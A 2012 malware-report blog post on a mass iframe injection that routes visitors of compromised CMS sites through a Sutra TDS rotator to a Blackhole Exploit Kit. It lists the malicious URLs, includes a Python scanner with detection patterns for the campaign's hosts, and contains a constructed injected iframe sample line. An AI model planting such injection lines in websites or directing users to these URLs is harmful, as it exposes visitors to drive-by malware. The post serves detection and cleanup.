Stop Malvertising Malware Reports

Massive iframe injection hits several CMS
Written by Kimberly on Thursday, 13 December 2012. Posted in Malware Reports Viewed 3825 times
A massive iframe injection is currently affecting a large number of websites running Joomla, WordPress, Drupal, the Yii Framework...

Initially the malicious URLs ended in nighttrend.cgi?8, but the URLs are now partially randomized. At the time of writing, the iframe on compromised websites points to:

jpscu.freewww.info/tgewogjqog9.cgi?4

The malicious domains act as a rotator. A rotator is a link into a Traffic Management System: it sends users to a different destination each time the link is requested, or delivers different content based on the geographic location of the visitor.

The rotator URLs might also encode the name of the group spreading the malware or a campaign ID. In this particular hacking spree the cybercriminals are using the Sutra TDS (Traffic Distribution System).

From jpscu.freewww.info the visitor is redirected to ggysxf.freewww.biz where a Blackhole Exploit Kit is awaiting the visitor.

ggysxf.freewww.biz/goodday/fresh/paper-rates_operators-apologys.php

[Screenshot: malicious iframe]

The malicious code has been injected into every single JavaScript file highlighted in green. As a result the domain running the Sutra TDS is called several times, but the visitor is only redirected once to the exploit kit; the other requests are redirected to Google.
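As an added example (not code from the original report), here is a small Python scanner a site owner could run over a webroot to list JavaScript or HTML files that reference the freewww.* rotator hosts and the <random>.cgi?<digit> URL shape described above. The sample file content embedded at the bottom is constructed, and the abcde host in it is a placeholder, not an indicator from the report.

```python
import os
import re
from typing import Iterator, List, Tuple

# Indicators taken from the report: the Sutra TDS host on freewww.info, the
# Blackhole landing host on freewww.biz, and the rotator path shape
# <random>.cgi?<digit> (nighttrend.cgi?8, tgewogjqog9.cgi?4).
TDS_HOST_RE = r"[a-z0-9]+\.freewww\.(?:info|biz)"
ROTATOR_PATH_RE = r"/[a-z0-9]+\.cgi\?\d+"

INJECTION_PATTERNS = [
    # an <iframe> whose src points at a freewww.* host (the report's primary indicator)
    re.compile(r"<iframe[^>]*\bsrc\s*=\s*[\"']?(?:https?:)?//(" + TDS_HOST_RE + r")", re.I),
    # any reference to the rotator URL shape on those hosts, even outside an <iframe>
    re.compile(r"(" + TDS_HOST_RE + ROTATOR_PATH_RE + r")", re.I),
]


def find_injections(text: str) -> List[Tuple[int, str]]:
    """Return (line_number, matched_indicator) pairs found in one file's content."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for pattern in INJECTION_PATTERNS:
            for m in pattern.finditer(line):
                hits.append((lineno, m.group(1).lower()))
    return list(dict.fromkeys(hits))  # de-duplicate, keep first-seen order


def scan_tree(root: str, exts=(".js", ".html", ".php")) -> Iterator[Tuple[str, int, str]]:
    """Walk a webroot and yield (path, line, indicator) for every hit in text files."""
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    content = fh.read()
            except OSError:
                continue  # unreadable file: skip, do not abort the scan
            for lineno, indicator in find_injections(content):
                yield path, lineno, indicator


# Constructed sample mimicking an injected JavaScript file (not a real capture);
# the abcde host is a placeholder standing in for an earlier-wave rotator host.
SAMPLE_JS = """function init(){ /* legitimate site code */ }
document.write('<iframe src="http://jpscu.freewww.info/tgewogjqog9.cgi?4" width="1" height="1"></iframe>');
var old = "http://abcde.freewww.info/nighttrend.cgi?8";
"""

if __name__ == "__main__":
    for lineno, indicator in find_injections(SAMPLE_JS):
        print(f"line {lineno}: {indicator}")
```

Run `scan_tree("/path/to/webroot")` to check a real site; a hit only means the file references the campaign's hosts and should be inspected, and a clean scan does not rule out other injected content.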

[Screenshot: massive iframe injection, Joomla site - www.versailles.com]

[Screenshot: massive iframe injection, WordPress site - fossfotography.com]

Website owners are advised to check for the presence of a web / root shell. If you don't know what a shell is, check out this topic.

If you or your company is using FileZilla or a similar FTP client that stores passwords in plain text, you need to:

  1. Check for the presence of malware and / or keyloggers on ALL computers that access the sites via FTP.
  2. Change all FTP credentials for every site.
  3. Switch to SFTP or FTPS. Most FTP clients support these protocols, but if you are on a shared server you have to make sure that your plan includes these secure protocols.

Make sure that EVERYTHING is up to date on your website and use strong passwords that are at least 16 characters long and include at least 1 or 2 special characters.


Resources

If your website is affected and / or you have more information on how they got in, don’t hesitate to drop us a note via the Contact Form.

